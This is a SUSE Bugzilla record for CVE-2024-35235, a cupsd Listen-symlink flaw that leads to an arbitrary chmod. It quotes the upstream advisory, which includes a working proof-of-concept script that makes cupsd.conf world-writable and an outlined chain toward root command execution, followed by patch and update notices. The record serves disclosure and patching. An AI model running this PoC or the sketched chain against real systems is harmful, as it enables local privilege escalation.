Bugzilla – Bug 1225365
VUL-0: CVE-2024-35235: cups: Listen port arbitrary chmod 0140777
Last modified: 2024-07-25 04:56:23 UTC
CRD: 2024-06-06 https://github.com/OpenPrinting/cups/security/advisories/GHSA-vvwp-mv6j-hw6f ================================================================ Cupsd Listen arbitrary chmod 0140777 Summary When starting the cupsd server with a Listen configuration item pointing to a symbolic link, the cupsd process can be caused to perform an arbitrary chmod of the provided argument, providing world-writable access to the target. Details This is an excerpt from a larger chain of vulnerabilities reported in Ubuntu 24.04. There is an assumption for exploitation that /etc/cups/cupsd.conf can be successfully edited (this has been omitted here as it is believed to be out of scope). When setting up the bind for unix sockets configured in the Listen parameters of the configuration file, the code does not check for a successful call to unlink and bind prior to performing the call to chmod. [1] On Ubuntu 24.04, by setting the Listen argument to a path such as /tmp/stage/file, where file is a symlink elsewhere in the system, the previous call to unlink for the path will fail due to AppArmor [2], and the subsequent call to bind will also fail due to the file still existing. The return value of the call to bind is not checked before the call to chmod, so a successfully planted symbolic link which causes the bind to fail will still be traversed by the call to chmod and the file permissions changed to be world writable. On systems where the Ubuntu AppArmor policy is not in place, this vulnerability still exists but as a race condition between the call to unlink and the call to bind. A sufficiently fast attacker could place a symbolic link at the configured location after the call to unlink, causing the bind to fail once again and performing a successful chmod. [1] cups/cups/http-addr.c Lines 229 to 240 in aba9170 ----------------------------------------------------- unlink(addr->un.sun_path); // Save the current umask and set it to 0 so that all users can access // the domain socket... mask = umask(0); // Bind the domain socket... status = bind(fd, (struct sockaddr *)addr, (socklen_t)httpAddrLength(addr)); // Restore the umask and fix permissions... umask(mask); chmod(addr->un.sun_path, 0140777); ----------------------------------------------------- [2] https://git.launchpad.net/ubuntu/+source/apparmor/tree/profiles/apparmor.d/abstractions/user-tmp#n21 PoC The following script can be used for exploitation, sudo is used to emulate the above mentioned Listen configuration access. ----------------------------------------------------- set -e exploit() { echo "Staging..." mkdir -m 777 /tmp/stage ln -s /etc/cups/cupsd.conf /tmp/stage/cupsd.conf # emulate configuration access to cupsd.conf echo 'Listen /tmp/stage/cupsd.conf' | sudo tee -a /etc/cups/cupsd.conf echo echo "Current permissions of cupsd.conf" ls -l /etc/cups/cupsd.conf tail -n1 /etc/cups/cupsd.conf || true echo echo "Restarting cupsd" sudo systemctl restart cups echo echo "New permissions of cupsd.conf" ls -l /etc/cups/cupsd.conf tail -n1 /etc/cups/cupsd.conf || true } cleanup() { sudo sed -i '/Listen \/tmp\/stage\/cupsd.conf/d' /etc/cups/cupsd.conf sudo chmod 640 /etc/cups/cupsd.conf rm -rf /tmp/stage } $@ ----------------------------------------------------- Sample output can be seen below: ----------------------------------------------------- $ sh poc.sh exploit Staging... Listen /tmp/stage/cupsd.conf Current permissions of cupsd.conf -rw-r----- 1 root lp 4987 May 24 10:18 /etc/cups/cupsd.conf tail: cannot open '/etc/cups/cupsd.conf' for reading: Permission denied Restarting cupsd New permissions of cupsd.conf -rwxrwxrwx 1 root lp 4987 May 24 10:18 /etc/cups/cupsd.conf Listen /tmp/stage/cupsd.conf $ sh poc.sh cleanup ----------------------------------------------------- Impact Given that cupsd is often running as root, this can result in the change of permission of any user or system files to be world writable. Given the aforementioned Ubuntu AppArmor context, on such systems this vulnerability is limited to those files modifiable by the cupsd process. In that specific case it was found to be possible to turn the configuration of the Listen argument into full control over the cupsd.conf and cups-files.conf configuration files. By later setting the User and Group arguments in cups-files.conf, and printing with a printer configured by PPD with a FoomaticRIPCommandLine argument, arbitrary user and group (not root) command execution could be achieved, which can further be used on Ubuntu systems to achieve full root command execution. ================================================================ GitHub has issued CVE-2024-35235 for this Security Advisory after reviewing it for compliance with CVE rules. Once you've published your Security Advisory, we'll publish the CVE to the CVE List https://cve.mitre.org/cve/ ================================================================ The currently proposed dates and time are: Today or tomorrow send announcement to distros list. Public disclosure next week June 06
CRD: 2024-06-11 14:00UTC
is public now there is vulnerability CVE-2024-35235 in cups project: Description Summary When starting the cupsd server with a Listen configuration item pointing to a symbolic link, the cupsd process can be caused to perform an arbitrary chmod of the provided argument, providing world-writable access to the target. Details This is an excerpt from a larger chain of vulnerabilities reported in Ubuntu 24.04. There is an assumption for exploitation that /etc/cups/cupsd.conf can be successfully edited (this has been omitted here as it is believed to be out of scope). When setting up the bind for unix sockets configured in the Listen parameters of the configuration file, the code does not check for a successful call to |unlink| and |bind| prior to performing the call to |chmod|. [1] On Ubuntu 24.04, by setting the Listen argument to a path such as |/tmp/stage/file|, where |file| is a symlink elsewhere in the system, the previous call to |unlink| for the path will fail due to AppArmor [2], and the subsequent call to |bind| will also fail due to the file still existing. The return value of the call to |bind| is not checked before the call to |chmod|, so a successfully planted symbolic link which causes the |bind| to fail will still be traversed by the call to |chmod| and the file permissions changed to be world writable. On systems where the Ubuntu AppArmor policy is not in place, this vulnerability still exists but as a race condition between the call to |unlink| and the call to |bind|. A sufficiently fast attacker could place a symbolic link at the configured location after the call to |unlink|, causing the |bind| to fail once again and performing a successful |chmod|. Severity: Moderate - CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N ....
Fixed for openSUSE Factory / Tumbleweed: ------------------------------------------------------- # osc submitrequest \ -m 'Fix for CVE-2024-35235 bsc#1225365' \ home:jsmeix:branches:Printing cups Printing cups created request id 1180031 # osc request accept \ -m 'Fix for CVE-2024-35235 bsc#1225365' 1180031 Result of change request state: ok ... openSUSE:Factory Forward this submit to it? ([y]/n)y The following submit request is already open: 1179938. Supersede the old request? (y/n/c) y Fix for CVE-2024-35235 bsc#1225365 (forwarded request 1180031 from jsmeix) New request # 1180032 -------------------------------------------------------
This is an autogenerated message for OBS integration: This bug (1225365) was mentioned in https://build.opensuse.org/request/show/1180032 Factory / cups
SUSE-SU-2024:2003-1: An update that solves one vulnerability and has one security fix can now be installed. Category: security (important) Bug References: 1223179, 1225365 CVE References: CVE-2024-35235 Maintenance Incident: [SUSE:Maintenance:34073](https://smelt.suse.de/incident/34073/) Sources used: openSUSE Leap Micro 5.3 (src): cups-2.2.7-150000.3.59.1 openSUSE Leap Micro 5.4 (src): cups-2.2.7-150000.3.59.1 openSUSE Leap 15.5 (src): cups-2.2.7-150000.3.59.1 openSUSE Leap 15.6 (src): cups-2.2.7-150000.3.59.1 SUSE Linux Enterprise Micro for Rancher 5.3 (src): cups-2.2.7-150000.3.59.1 SUSE Linux Enterprise Micro 5.3 (src): cups-2.2.7-150000.3.59.1 SUSE Linux Enterprise Micro for Rancher 5.4 (src): cups-2.2.7-150000.3.59.1 SUSE Linux Enterprise Micro 5.4 (src): cups-2.2.7-150000.3.59.1 SUSE Linux Enterprise Micro 5.5 (src): cups-2.2.7-150000.3.59.1 Basesystem Module 15-SP5 (src): cups-2.2.7-150000.3.59.1 Basesystem Module 15-SP6 (src): cups-2.2.7-150000.3.59.1 Desktop Applications Module 15-SP5 (src): cups-2.2.7-150000.3.59.1 Desktop Applications Module 15-SP6 (src): cups-2.2.7-150000.3.59.1 Development Tools Module 15-SP5 (src): cups-2.2.7-150000.3.59.1 Development Tools Module 15-SP6 (src): cups-2.2.7-150000.3.59.1 SUSE Linux Enterprise High Performance Computing 15 SP2 LTSS 15-SP2 (src): cups-2.2.7-150000.3.59.1 SUSE Linux Enterprise High Performance Computing LTSS 15 SP3 (src): cups-2.2.7-150000.3.59.1 SUSE Linux Enterprise High Performance Computing ESPOS 15 SP4 (src): cups-2.2.7-150000.3.59.1 SUSE Linux Enterprise High Performance Computing LTSS 15 SP4 (src): cups-2.2.7-150000.3.59.1 SUSE Linux Enterprise Desktop 15 SP4 LTSS 15-SP4 (src): cups-2.2.7-150000.3.59.1 SUSE Linux Enterprise Server 15 SP2 LTSS 15-SP2 (src): cups-2.2.7-150000.3.59.1 SUSE Linux Enterprise Server 15 SP3 LTSS 15-SP3 (src): cups-2.2.7-150000.3.59.1 SUSE Linux Enterprise Server 15 SP4 LTSS 15-SP4 (src): cups-2.2.7-150000.3.59.1 SUSE Linux Enterprise Server for SAP Applications 15 SP2 (src): cups-2.2.7-150000.3.59.1 SUSE Linux Enterprise Server for SAP Applications 15 SP3 (src): cups-2.2.7-150000.3.59.1 SUSE Linux Enterprise Server for SAP Applications 15 SP4 (src): cups-2.2.7-150000.3.59.1 SUSE Manager Proxy 4.3 (src): cups-2.2.7-150000.3.59.1 SUSE Manager Retail Branch Server 4.3 (src): cups-2.2.7-150000.3.59.1 SUSE Manager Server 4.3 (src): cups-2.2.7-150000.3.59.1 SUSE Enterprise Storage 7.1 (src): cups-2.2.7-150000.3.59.1 SUSE Linux Enterprise Micro 5.2 (src): cups-2.2.7-150000.3.59.1 SUSE Linux Enterprise Micro for Rancher 5.2 (src): cups-2.2.7-150000.3.59.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2024:2002-1: An update that solves one vulnerability can now be installed. Category: security (important) Bug References: 1225365 CVE References: CVE-2024-35235 Maintenance Incident: [SUSE:Maintenance:34177](https://smelt.suse.de/incident/34177/) Sources used: SUSE Linux Enterprise Software Development Kit 12 SP5 (src): cups-1.7.5-20.49.1 SUSE Linux Enterprise High Performance Computing 12 SP5 (src): cups-1.7.5-20.49.1 SUSE Linux Enterprise Server 12 SP5 (src): cups-1.7.5-20.49.1 SUSE Linux Enterprise Server for SAP Applications 12 SP5 (src): cups-1.7.5-20.49.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2024:2003-2: An update that solves one vulnerability and has one security fix can now be installed. Category: security (important) Bug References: 1223179, 1225365 CVE References: CVE-2024-35235 Maintenance Incident: [SUSE:Maintenance:34073](https://smelt.suse.de/incident/34073/) Sources used: SUSE Linux Enterprise Micro 5.5 (src): cups-2.2.7-150000.3.59.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.